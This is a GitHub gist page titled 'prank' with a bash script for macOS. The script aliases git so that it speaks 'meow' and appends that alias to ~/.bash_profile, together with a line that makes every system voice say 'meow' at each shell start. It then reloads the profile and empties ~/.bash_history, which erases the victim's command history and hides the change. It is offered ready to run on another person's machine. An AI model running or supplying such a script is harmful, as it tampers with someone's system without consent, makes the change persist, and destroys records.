Last active
April 27, 2018 08:25
-
-
Save Deadlyelder/96f21c27c4120bd16b18ec326e43f881 to your computer and use it in GitHub Desktop.
prank
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
GIT=`which git` | |
CMD="say -r 600 -v Karen meow; $GIT" | |
echo alias git="\"$CMD\"" >> ~/.bash_profile | |
echo 'say -v ? | awk '\''{print $1}'\'' | xargs -I {} say -r 700 -v {} meow' >> ~/.bash_profile | |
source ~/.bash_profile | |
cat /dev/null > ~/.bash_history |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment